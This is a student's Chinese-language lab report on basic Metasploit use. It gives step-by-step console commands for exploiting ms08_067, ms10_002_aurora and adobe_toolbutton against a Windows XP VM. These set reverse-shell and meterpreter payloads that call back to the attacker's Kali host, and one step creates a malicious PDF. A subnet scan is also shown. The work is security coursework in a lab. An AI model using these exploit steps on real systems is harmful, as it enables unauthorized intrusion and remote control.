20154332_Exp5_MSF基础应用
Posted 4332renqing
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了20154332_Exp5_MSF基础应用相关的知识,希望对你有一定的参考价值。
准备阶段
- 在安装好window XP的虚拟机后查看靶机IP:192.168.160.130
- kali IP:192.168.160.128
1、主动攻击:ms08_067
- 先使用msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块:
由此图可知:
- 使用这个模块,show targets查看可以被攻击的靶机的操作系统型号:
- 接下来可以查看相应的攻击载荷,首先我们可以查看可使用的载荷
show payloads,
- 我们想要获取靶机的shell
set payload generic/shell_reverse_tcp
- 查看配置渗透攻击所需的配置项show options
- 通过上述操作,可以让我们知道有哪些参数需要进行配置
set LHOST 192.168.160.128 //设置kali攻击IP,
set RHOST 192.168.160.130 //设置靶机IP
-
设置相应平台的编号:set target 0
此处不设置也可以,msf平台可以自动帮你从第一个开始搜索满足要求的靶机平台 -
发起渗透攻击 exploit获取shell如下图所示
-
来看看靶机的ip
成功!
2、MS10_002_aurora漏洞攻击
-
同上,先使用msfconsole进入msf,再用search MS10_002_aurora查询一下针对该漏洞的攻击模块: 由此图可知:
-
使用这个攻击模块use exploit/windows/browser/ms10_002_aurora
并获取靶机的shell set payload generic/shell_reverse_tcp
-
将服务器端口设为set SRVPORT 80
查看配置渗透攻击所需的配置项 show options
-
set LHOST 192.168.160.128 //设置kali攻击IP,
-
set SRVHOST 192.168.160.128
- 发起渗透攻击 exploit
- 成功生成了一个URL,在靶机的IE下访问。
- 再回到kali中查看,如图所示,成功!
- 尝试输入指令,成功。
- 获得靶机ip
3. 对Adobe的漏洞攻击:adobe_toolbutton
- 同上,先使用msfconsole进入msf,再用search adobe查询一下针对该漏洞的攻击模块,选择的是use exploit/windows/fileformat/adobe_toolbutton,然后使用该模块
-
用info查看该模块的信息(这个指令相当于show targets、show options等的集合版)可以看到适合这个漏洞的版本:
-
set LHOST 192.168.160.128
//kali ip -
set LPORT 4332
-
set FILENAME 20154332.pdf//文件命名
-
设置好相应参数后,开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个lxm.pdf文件:
- 将pdf文件拷贝进入靶机中,进行回连依次输入
- use exploit/multi/handler
set payload - windows/meterpreter/reverse_tcp
- set LHOST 192.168.160.128
- set LPORT 4332
- exploit
- 第一次失败,因为靶机上开启了杀毒软件,
- 关闭后再次尝试,
- 尝试输入指令,成功!!!
4、辅助模块应用
-
使用show auxiliary查看可以运用的辅助模块。
-
先使用msfconsole进入msf,再用show auxiliary查看可以运用的辅助模块。由此图可知:
-
我使用 use auxiliary/scanner/oracle/tnslsnr_version 模块
-
用info查看一下需要更改的参数
-
设置扫描区段: set RHOST 172.30.4.0/24
-
设置线程: set THREADS 50
-
创建完成,运行!
-
成功!!!
基础问题回答:
(1)用自己的话解释什么是exploit,payload,encode.
- exploit,就是可以利用漏洞去攻击,生成或启动已经设置好的攻击程序,获得相应权限。
- payload,真正具有攻击性的代码包装成可插入到目标主机。
- encode通过编码改变特征码。
实践总结与体会
这次的实验在发现漏洞,并根据此漏洞获取权限,在实验过程中可以发现,这些漏洞都是很早之前的漏洞,在一些新版本上根本使用不了,新版本已经有了改进,所以对实验中对软件的版本有很大的要求。
通过这次实验了解到漏洞如此之多,以后需要常打补丁,时常更新。
以上是关于20154332_Exp5_MSF基础应用的主要内容,如果未能解决你的问题,请参考以下文章